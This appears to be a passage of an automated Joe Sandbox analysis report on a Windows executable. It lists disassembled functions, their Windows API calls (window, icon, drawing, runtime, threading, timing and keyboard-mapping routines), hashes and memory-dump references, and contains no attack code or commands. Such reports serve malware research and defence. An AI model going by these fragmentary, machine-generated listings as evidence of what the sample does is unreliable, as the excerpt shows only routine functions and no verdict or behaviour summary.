                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Window$Enable$Show$MessageSend
                                                            • String ID:
                                                            • API String ID: 1871949834-0
                                                            • Opcode ID: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                                                            • Instruction ID: ab733961f10eda6fa12bc0977b233c6b2b6736debfa9bed553c9f015fe8cd40e
                                                            • Opcode Fuzzy Hash: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                                                            • Instruction Fuzzy Hash: 6931B3B17443815BF7258E24CCC4BAFB7D0EB95345F08482EF58196291DBAC9845C75A
                                                            Function 00441078 Relevance: 9.1, APIs: 6, Instructions: 86COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                                                            • Instruction ID: c6101d665a98d140be62f029472ab7f8db1b0ce4c02a7c647e8453833b83309f
                                                            • Opcode Fuzzy Hash: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                                                            • Instruction Fuzzy Hash: 5F21B672204110ABEB108F699C85B6F7798EB49370F24463BF625C62E0DB74D8C1C76D
                                                            Function 00471A38 Relevance: 9.1, APIs: 6, Instructions: 79windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 00471A45
                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,00000000,?,00000001), ref: 00471A86
                                                            • SendMessageW.USER32(?,00001303,00000000,00000000), ref: 00471AA8
                                                            • ImageList_ReplaceIcon.COMCTL32(?,?,?,?,00000000,?,00000001), ref: 00471ABF
                                                            • SendMessageW.USER32 ref: 00471AE3
                                                            • DestroyIcon.USER32(?), ref: 00471AF4
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Icon$ImageList_MessageSend$CreateDestroyExtractReplace
                                                            • String ID:
                                                            • API String ID: 3611059338-0
                                                            • Opcode ID: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                                                            • Instruction ID: ff529b192773d28f9e5fe2f6f8d7a9043cb056f7fe4a3f7912da33dbd9270a4a
                                                            • Opcode Fuzzy Hash: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                                                            • Instruction Fuzzy Hash: FB21AB71600204AFEB10CF64DD85FAA73B5FF88700F10846EFA05AB290DBB4A9428B64
                                                            Function 00455616 Relevance: 9.1, APIs: 6, Instructions: 78windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: DestroyWindow$DeleteObject$IconMove
                                                            • String ID:
                                                            • API String ID: 1640429340-0
                                                            • Opcode ID: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                                                            • Instruction ID: 1af524ae86da71fe4f89171a472fc693caa25f853ed14bd6ff7d4c509651bbe6
                                                            • Opcode Fuzzy Hash: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                                                            • Instruction Fuzzy Hash: C6311874200A41DFC710DF24D9D8B3A77E9FB48712F0445AAE946CB262D778E848CB69
                                                            Function 0044389A Relevance: 9.1, APIs: 6, Instructions: 76COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                              • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                            • _wcslen.LIBCMT ref: 004438CD
                                                            • _wcslen.LIBCMT ref: 004438E6
                                                            • _wcstok.LIBCMT ref: 004438F8
                                                            • _wcslen.LIBCMT ref: 0044390C
                                                            • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0044391A
                                                            • _wcstok.LIBCMT ref: 00443931
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: _wcslen$_wcstok$ExtentPoint32Text_wcscpy
                                                            • String ID:
                                                            • API String ID: 3632110297-0
                                                            • Opcode ID: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                                                            • Instruction ID: d12b8bce329459066c03420e1b0c57cf331e6d1a2def9435cce8fb2ce1fb425a
                                                            • Opcode Fuzzy Hash: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                                                            • Instruction Fuzzy Hash: 9621B072900305ABDB10AF559C82AAFB7F8FF48711F64482EF95993301E678EA5087A5
                                                            Function 00455168 Relevance: 9.1, APIs: 6, Instructions: 75windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Destroy$DeleteMenuObject$IconWindow
                                                            • String ID:
                                                            • API String ID: 752480666-0
                                                            • Opcode ID: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                                                            • Instruction ID: 7b220c8407ffc283b2c26cc65a644285b0b18e1ed163c7e0472fb9f2b18bc557
                                                            • Opcode Fuzzy Hash: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                                                            • Instruction Fuzzy Hash: B7215970600A01DFD714DF29D9E8B3A7BA9BF49312F04855AE8468B352C738EC89CB59
                                                            Function 004552FA Relevance: 9.1, APIs: 6, Instructions: 72windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                            • String ID:
                                                            • API String ID: 3275902921-0
                                                            • Opcode ID: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                                                            • Instruction ID: 11d86efc281b6c380d974b68bd8b9632be9d9c574e85584f431c859402bfc888
                                                            • Opcode Fuzzy Hash: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                                                            • Instruction Fuzzy Hash: 9C217C70200A01DFC714DF39D998A6AB7E4BF49311F10862EE959C7392D778D845CB58
                                                            Function 004556C8 Relevance: 9.1, APIs: 6, Instructions: 67windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                            • String ID:
                                                            • API String ID: 3275902921-0
                                                            • Opcode ID: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                                                            • Instruction ID: f2615e71845bffb995fe2c2b9381f89f67980fa6d4eb7dd8f13843e5971e4781
                                                            • Opcode Fuzzy Hash: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                                                            • Instruction Fuzzy Hash: 54213D70200A01DFD710EF25D9D4A2B37E9BF49312F10896EE945CB352D739D845CB69
                                                            Function 004331A2 Relevance: 9.1, APIs: 6, Instructions: 64sleepCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                            • QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331D4
                                                            • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331DE
                                                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331E6
                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331F0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: PerformanceQuery$CounterSleep$Frequency
                                                            • String ID:
                                                            • API String ID: 2833360925-0
                                                            • Opcode ID: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                                                            • Instruction ID: f8c058edd9890a080c9b5d5c764251204f1987641da473bf5ecf7e3e358c806a
                                                            • Opcode Fuzzy Hash: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                                                            • Instruction Fuzzy Hash: 1911B632D0011DABCF00DFD9EA489EEB778FF49722F1145AAED04A6204DB755A01CBA4
                                                            Function 004555A8 Relevance: 9.1, APIs: 6, Instructions: 61windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32 ref: 004555C7
                                                            • SendMessageW.USER32(?,00001008,00000000,00000000), ref: 004555E2
                                                            • DeleteObject.GDI32(?), ref: 00455736
                                                            • DeleteObject.GDI32(?), ref: 00455744
                                                            • DestroyIcon.USER32(?), ref: 00455752
                                                            • DestroyWindow.USER32(?), ref: 00455760
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: DeleteDestroyMessageObjectSend$IconWindow
                                                            • String ID:
                                                            • API String ID: 3691411573-0
                                                            • Opcode ID: a36765697229ff4e213bf7548d3c220621229afc2c11469716cb0ded27b8d901
                                                            • Instruction ID: 7bbaf3a525edecc9c7f674a1bc178dbce74773f27e06def1294b58b6a87c9b54
                                                            • Opcode Fuzzy Hash: a36765697229ff4e213bf7548d3c220621229afc2c11469716cb0ded27b8d901
                                                            • Instruction Fuzzy Hash: 3D116071204601DBC710DF69EDC8A2A77A8FB58322F10466AFD10DB292D779D849CB68
                                                            Function 00447275 Relevance: 9.0, APIs: 6, Instructions: 50COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                              • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                              • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                              • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                              • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                            • MoveToEx.GDI32(?,?,?,00000000), ref: 004472A0
                                                            • LineTo.GDI32(?,?,?), ref: 004472AC
                                                            • MoveToEx.GDI32(?,?,?,00000000), ref: 004472BA
                                                            • LineTo.GDI32(?,?,?), ref: 004472C6
                                                            • EndPath.GDI32(?), ref: 004472D6
                                                            • StrokePath.GDI32(?), ref: 004472E4
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: ObjectPath$LineMoveSelect$BeginCreateDeleteStroke
                                                            • String ID:
                                                            • API String ID: 372113273-0
                                                            • Opcode ID: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                                                            • Instruction ID: 9972a7b2ea06d4c5ad2b855a17b8a9a0d98d12ec42d2644493c4a69bc6448ed6
                                                            • Opcode Fuzzy Hash: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                                                            • Instruction Fuzzy Hash: 7701BC76101214BBE3119B44ED8DFDF7B6CEF4A710F104259FA01A629187F42A02CBBD
                                                            Function 0044CC51 Relevance: 9.0, APIs: 6, Instructions: 50COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetDC.USER32(00000000), ref: 0044CC6D
                                                            • GetDeviceCaps.GDI32(00000000,00000058), ref: 0044CC78
                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0044CC84
                                                            • ReleaseDC.USER32(00000000,00000000), ref: 0044CC90
                                                            • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCA8
                                                            • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCB9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: CapsDevice$Release
                                                            • String ID:
                                                            • API String ID: 1035833867-0
                                                            • Opcode ID: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                                                            • Instruction ID: 48d0fedbc9b5ed1f8cca1220e36c4d83aa6571d18a2c693a8c9b468b660f0fbb
                                                            • Opcode Fuzzy Hash: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                                                            • Instruction Fuzzy Hash: 60015276240214BFFB009F95DD89F5A7BACFF54751F14802EFF089B240D6B098008BA4
                                                            Function 00417082 Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • __getptd.LIBCMT ref: 0041708E
                                                              • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                                              • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                                                            • __amsg_exit.LIBCMT ref: 004170AE
                                                            • __lock.LIBCMT ref: 004170BE
                                                            • InterlockedDecrement.KERNEL32(?), ref: 004170DB
                                                            • _free.LIBCMT ref: 004170EE
                                                            • InterlockedIncrement.KERNEL32(02E82CE0), ref: 00417106
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                            • String ID:
                                                            • API String ID: 3470314060-0
                                                            • Opcode ID: 80714434994c9102abdbbcfc383ede657addd51ae4f203e3d2298efcf25a3187
                                                            • Instruction ID: d92c7102fc6d098775a0f5363b9b5483e5b10d08a1c29475ed017091780ded1e
                                                            • Opcode Fuzzy Hash: 80714434994c9102abdbbcfc383ede657addd51ae4f203e3d2298efcf25a3187
                                                            • Instruction Fuzzy Hash: 3301AD32905711ABC721ABA698497DE7BB0AB04724F15416BF950A7381CB3CAAC1CFDD
                                                            Function 0044B63B Relevance: 9.0, APIs: 6, Instructions: 40synchronizationthreadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • InterlockedExchange.KERNEL32(?,?), ref: 0044B655
                                                            • EnterCriticalSection.KERNEL32(?), ref: 0044B666
                                                            • TerminateThread.KERNEL32(?,000001F6), ref: 0044B674
                                                            • WaitForSingleObject.KERNEL32(?,000003E8,?,000001F6), ref: 0044B682
                                                              • Part of subcall function 00432614: CloseHandle.KERNEL32(00000000,00000000,?,0044B68E,00000000,?,000003E8,?,000001F6), ref: 00432622
                                                            • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B697
                                                            • LeaveCriticalSection.KERNEL32(?), ref: 0044B69E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                            • String ID:
                                                            • API String ID: 3495660284-0
                                                            • Opcode ID: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                                                            • Instruction ID: c0d5b59c8b9084ef0a5212f46b36de0b3fb5a8468090cd03c061fc2099eb7203
                                                            • Opcode Fuzzy Hash: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                                                            • Instruction Fuzzy Hash: A8F0AF72141201BBD210AB64EE8CDAFB77CFF88311F40092AFA0192560CBB4E420CBB6
                                                            Function 00410AB0 Relevance: 9.0, APIs: 6, Instructions: 40keyboardCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00410AE8
                                                            • MapVirtualKeyW.USER32(00000010,00000000), ref: 00410AF0
                                                            • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00410AFB
                                                            • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00410B06
                                                            • MapVirtualKeyW.USER32(00000011,00000000), ref: 00410B0E
                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00410B16
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
